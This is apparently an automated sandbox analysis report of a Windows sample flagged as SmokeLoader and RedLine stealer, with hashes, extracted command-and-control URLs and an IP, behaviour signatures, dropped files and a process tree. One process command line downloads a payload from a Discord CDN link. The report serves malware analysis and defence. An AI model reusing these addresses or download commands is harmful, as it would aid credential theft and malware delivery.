redline | b87200fd33230fb9a0c284b030ca1c07f5b63c379531de918c7da6288281c5e3

Analysis

max time kernel
152s
max time network
134s
platform
windows10_x64
resource
win10v20210410
submitted
23-08-2021 13:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b87200fd33230fb9a0c284b030ca1c07f5b63c379531de918c7da6288281c5e3.exe
Size

277KB
MD5

417141e9d2e0fed64579e7ae12507eac
SHA1

51142084ed69f120bd232ee82aebb7aa45382359
SHA256

b87200fd33230fb9a0c284b030ca1c07f5b63c379531de918c7da6288281c5e3
SHA512

bc15667948b9afce15a8f8142f06c5a60f75827a5ca0bd1e4790cd92de76adfa4de15a3c3bff0eac6663f7e2df9c42a1635d67d73f86905a77dff70ba0064c52

Score

10^/10

redline smokeloader @soul3ss backdoor discovery infostealer spyware stealer trojan upx

Malware Config

Extracted

Family

smokeloader

Version

2020

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

@soul3ss

188.130.139.12:30376

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\32461\soul3ss.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\32461\soul3ss.exe	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Downloads MZ/PE file
Executes dropped EXE 6 IoCs

Processes:

928.exeextd.exeextd.exeextd.exesoul3ss.exeextd.exe

pid process

1264 928.exe
2356 extd.exe
3928 extd.exe
3908 extd.exe
1268 soul3ss.exe
2184 extd.exe

pid	process
1264	928.exe
2356	extd.exe
3928	extd.exe
3908	extd.exe
1268	soul3ss.exe
2184	extd.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe	upx

Deletes itself 1 IoCs

Processes:

pid process

2460
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

pid	process
2460

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

b87200fd33230fb9a0c284b030ca1c07f5b63c379531de918c7da6288281c5e3.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	b87200fd33230fb9a0c284b030ca1c07f5b63c379531de918c7da6288281c5e3.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	b87200fd33230fb9a0c284b030ca1c07f5b63c379531de918c7da6288281c5e3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	b87200fd33230fb9a0c284b030ca1c07f5b63c379531de918c7da6288281c5e3.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

b87200fd33230fb9a0c284b030ca1c07f5b63c379531de918c7da6288281c5e3.exe

pid	process
3624	b87200fd33230fb9a0c284b030ca1c07f5b63c379531de918c7da6288281c5e3.exe
3624	b87200fd33230fb9a0c284b030ca1c07f5b63c379531de918c7da6288281c5e3.exe
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460
2460

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2460
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

b87200fd33230fb9a0c284b030ca1c07f5b63c379531de918c7da6288281c5e3.exe

pid process

3624 b87200fd33230fb9a0c284b030ca1c07f5b63c379531de918c7da6288281c5e3.exe

pid	process
2460

Suspicious use of AdjustPrivilegeToken 53 IoCs

Processes:

soul3ss.exe

description	pid	process
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeDebugPrivilege	1268	soul3ss.exe
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460
Token: SeShutdownPrivilege	2460
Token: SeCreatePagefilePrivilege	2460

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

2460

pid	process
2460

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

928.execmd.exe

description	pid	process	target process
PID 2460 wrote to memory of 1264	2460		928.exe
PID 2460 wrote to memory of 1264	2460		928.exe
PID 1264 wrote to memory of 1944	1264	928.exe	cmd.exe
PID 1264 wrote to memory of 1944	1264	928.exe	cmd.exe
PID 1944 wrote to memory of 2356	1944	cmd.exe	extd.exe
PID 1944 wrote to memory of 2356	1944	cmd.exe	extd.exe
PID 1944 wrote to memory of 3928	1944	cmd.exe	extd.exe
PID 1944 wrote to memory of 3928	1944	cmd.exe	extd.exe
PID 1944 wrote to memory of 3908	1944	cmd.exe	extd.exe
PID 1944 wrote to memory of 3908	1944	cmd.exe	extd.exe
PID 1944 wrote to memory of 1268	1944	cmd.exe	soul3ss.exe
PID 1944 wrote to memory of 1268	1944	cmd.exe	soul3ss.exe
PID 1944 wrote to memory of 1268	1944	cmd.exe	soul3ss.exe
PID 1944 wrote to memory of 2184	1944	cmd.exe	extd.exe
PID 1944 wrote to memory of 2184	1944	cmd.exe	extd.exe

C:\Users\Admin\AppData\Local\Temp\b87200fd33230fb9a0c284b030ca1c07f5b63c379531de918c7da6288281c5e3.exe
"C:\Users\Admin\AppData\Local\Temp\b87200fd33230fb9a0c284b030ca1c07f5b63c379531de918c7da6288281c5e3.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3624

C:\Users\Admin\AppData\Local\Temp\928.exe
C:\Users\Admin\AppData\Local\Temp\928.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1264

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\A44.bat C:\Users\Admin\AppData\Local\Temp\928.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1944

C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:2356

C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:3928

C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879356613826314250/soul3ss.exe" "soul3ss.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:3908

C:\Users\Admin\AppData\Local\Temp\32461\soul3ss.exe
soul3ss.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1268

C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:2184

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\32461\soul3ss.exe
MD5
411ca7ba89ae45e92f9ed4663f903335

SHA1
6360b07844800b8e6e6e2b11ee3c8d051c4a2e96

SHA256
6780a257463d037daff9f626aecee2347177edfb0851ee12d33ba225ab38f009

SHA512
bfd58e96af22f17fab2cff4b360d79621b738128c61f01420963a1119d27320eb97a64fef42819e9ea7ffab39289f19b82f8911e227236435a87151d55d9e754

Download Submit
C:\Users\Admin\AppData\Local\Temp\32461\soul3ss.exe
MD5
411ca7ba89ae45e92f9ed4663f903335

SHA1
6360b07844800b8e6e6e2b11ee3c8d051c4a2e96

SHA256
6780a257463d037daff9f626aecee2347177edfb0851ee12d33ba225ab38f009

SHA512
bfd58e96af22f17fab2cff4b360d79621b738128c61f01420963a1119d27320eb97a64fef42819e9ea7ffab39289f19b82f8911e227236435a87151d55d9e754

Download Submit
C:\Users\Admin\AppData\Local\Temp\928.exe
MD5
e16f915796d4762014fc3864d4444ac3

SHA1
819364784cf0d3fe440b6c9a3950de7fa093e805

SHA256
65dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd

SHA512
1c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\928.exe
MD5
e16f915796d4762014fc3864d4444ac3

SHA1
819364784cf0d3fe440b6c9a3950de7fa093e805

SHA256
65dee75f5d4f0d7e0c1065a689ebe79f67c87a4d3d9654193164128e859a0ddd

SHA512
1c3721ebe22c1e9b9b5f51926d9e1bd1d26fca9b57f25161afefdeca9bdb3a1551fb4931fdbbe16df59c43c8a4eaa2131ab508a97a39cd6ddaf04003d9adca2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\A44.bat
MD5
891e4caaa5e1481cffcf068cca7fe4c3

SHA1
8cb0087fdaa3bfca8e7c47b86ff04124e27a1c01

SHA256
ee38953d35bb0a7828c2c54ea7f6ea4c862d7b34a213049e61f731cda9e2acbb

SHA512
d6c7f28cbdc653080bc97733d0de344b3fc6bfb5caf42236e1308206abd0aa65112d72a4714907553e3d5f80f663721d894fe505876d482488e3aa718201398d

Download Submit
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
C:\Users\Admin\AppData\Local\Temp\A42.tmp\A43.tmp\extd.exe
MD5
b019efc4814c7a73b1413a335be1fa13

SHA1
6e093c94cfa4a0fe25e626875f2b06a5cbc622d2

SHA256
a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e

SHA512
d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b

Download Submit
memory/1264-117-0x0000000000000000-mapping.dmp

Download
memory/1268-139-0x00000000057D0000-0x00000000057D1000-memory.dmp

Filesize
4KB

Download
memory/1268-142-0x00000000056D0000-0x0000000005BCE000-memory.dmp

Filesize
5.0MB

Download
memory/1268-149-0x0000000001660000-0x0000000001661000-memory.dmp

Filesize
4KB

Download
memory/1268-148-0x0000000009490000-0x0000000009491000-memory.dmp

Filesize
4KB

Download
memory/1268-129-0x0000000000000000-mapping.dmp

Download
memory/1268-147-0x00000000091E0000-0x00000000091E1000-memory.dmp

Filesize
4KB

Download
memory/1268-146-0x0000000009120000-0x0000000009121000-memory.dmp

Filesize
4KB

Download
memory/1268-145-0x0000000009650000-0x0000000009651000-memory.dmp

Filesize
4KB

Download
memory/1268-144-0x0000000008F50000-0x0000000008F51000-memory.dmp

Filesize
4KB

Download
memory/1268-134-0x0000000000E10000-0x0000000000E11000-memory.dmp

Filesize
4KB

Download
memory/1268-136-0x0000000005BD0000-0x0000000005BD1000-memory.dmp

Filesize
4KB

Download
memory/1268-137-0x00000000066E0000-0x00000000066E1000-memory.dmp

Filesize
4KB

Download
memory/1268-138-0x0000000005820000-0x0000000005821000-memory.dmp

Filesize
4KB

Download
memory/1268-143-0x0000000006620000-0x0000000006621000-memory.dmp

Filesize
4KB

Download
memory/1268-140-0x0000000005A10000-0x0000000005A11000-memory.dmp

Filesize
4KB

Download
memory/1268-141-0x00000000059B0000-0x00000000059B1000-memory.dmp

Filesize
4KB

Download
memory/1944-120-0x0000000000000000-mapping.dmp

Download
memory/2184-131-0x0000000000000000-mapping.dmp

Download
memory/2356-122-0x0000000000000000-mapping.dmp

Download
memory/2460-116-0x0000000000740000-0x0000000000756000-memory.dmp

Filesize
88KB

Download
memory/3624-115-0x0000000000400000-0x00000000023AF000-memory.dmp

Filesize
31.7MB

Download
memory/3624-114-0x0000000000030000-0x0000000000039000-memory.dmp

Filesize
36KB

Download
memory/3908-127-0x0000000000000000-mapping.dmp

Download
memory/3928-125-0x0000000000000000-mapping.dmp

Download